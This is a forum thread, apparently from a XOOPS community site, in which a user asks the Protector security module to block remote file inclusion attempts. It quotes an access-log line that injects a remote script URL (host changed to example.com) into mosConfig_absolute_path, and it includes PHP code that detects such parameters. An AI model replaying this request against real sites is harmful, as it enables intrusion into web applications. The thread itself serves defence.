1
peterr
Protector - feature request
  • 2008/5/9 12:09

  • peterr

  • Just can't stay away

  • Posts: 518

  • Since: 2004/8/5 9


Have been using Protector for a while, and would like to see it "trap" any HTTP request that is obviously trying to parse a script from a remote site. These do not always result in a 403 or a 404 either, depending upon server security and configuration.

The type of requests are of the format:

Quote:

208.113.196.15 - - [09/May/2008:04:54:57 +1000] "GET /modules/xhld0/index.php?_REQUEST=&_REQUEST%5boption%5d=com_zoom&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://example.com/modules/test.txt??? HTTP/1.1" 302 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0"


(domain name of remote url changed in the above, for obvious reasons).

returns a 302, and often other attempts at remote script parsing return a 200, so XOOPS thinks that "all is well", despite the fact that Protector is installed.

I don't think the 'blanket approach' of setting "allow_url_fopen" value to off is suitable for all sites. Turning this option off is recommended when using Protector, however server setup/config., and especially PHP version, has a bearing on whether or not this setting should really be off.

See these discussions:

http://foundationphp.com/phpsolutions/updates.php
http://www.webmasterworld.com/forum88/10940.htm

Determining if the string 'http' was being parsed, could be something like ..

$pos = strpos(strtolower($_SERVER['REQUEST_URI']), 'http:');


As the version of PHP has some bearing on the need to have the setting "allow_url_fopen" value to off, the PHP function phpversion() could be utilised.

My 0.001 cents worth anyway.
NO to the Microsoft Office format as an ISO standard.
Sign the petition
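
An added example, not part of the post above and not Protector's own code: one way to build the check the post proposes. It goes beyond the plain `strpos` test by URL-decoding each query parameter and matching a remote scheme only at the start of the value, so encoded variants are caught and ordinary text containing "http" is not. The function name `find_remote_url_params` and the scheme list are assumptions.

```php
<?php
// Added example; not Protector code. Function name and scheme list are assumptions.

/**
 * Return the names of query parameters whose decoded value begins with a
 * remote URL scheme (the remote-include pattern in the quoted log line).
 */
function find_remote_url_params(string $requestUri): array
{
    $qpos = strpos($requestUri, '?');
    if ($qpos === false) {
        return [];
    }
    $hits = [];
    foreach (explode('&', substr($requestUri, $qpos + 1)) as $pair) {
        $parts = explode('=', $pair, 2);
        $name  = rawurldecode($parts[0]);
        // Decode twice so double-encoded values (http%253A%252F%252F) are caught too.
        $value = rawurldecode(rawurldecode($parts[1] ?? ''));
        // Anchor at the start of the value: a parameter that *is* a URL is
        // suspicious, while "http" somewhere inside free text is not flagged.
        if (preg_match('#^\s*(?:https?|ftps?)://#i', $value)) {
            $hits[] = $name;
        }
    }
    return $hits;
}

// Constructed sample inputs; the first is the request URI from the quoted log line.
$samples = [
    '/modules/xhld0/index.php?_REQUEST=&_REQUEST%5boption%5d=com_zoom&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://example.com/modules/test.txt???',
    '/index.php?page=HtTp%3A%2F%2Fexample.com%2Ftest.txt',    // encoded, mixed case
    '/modules/news/article.php?storyid=12&title=http+basics', // benign
];

foreach ($samples as $uri) {
    $hits = find_remote_url_params($uri);
    echo ($hits ? 'BLOCK ' . implode(',', $hits) : 'ok') . "  $uri\n";
}
```

In a live request handler the function would be called with `$_SERVER['REQUEST_URI']`, and a non-empty result logged and answered with a 403. It inspects the query string only, so POST bodies and cookies need the same treatment separately.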

2
Anonymous
Re: Protector - feature request
  • 2008/5/9 12:24

  • Anonymous

  • Posts: 0

  • Since:


I doubt that GiJoe, the module's author, will see this.

Might be best posting this on his own site's Forums:
http://xoops.peak.ne.jp/

3
peterr
Re: Protector - feature request
  • 2008/5/9 12:42

  • peterr

  • Just can't stay away

  • Posts: 518

  • Since: 2004/8/5 9


Thanks, I have PM'd the author of the Protector documentation, who seems to be a regular poster on the Peak website.
NO to the Microsoft Office format as an ISO standard.
Sign the petition
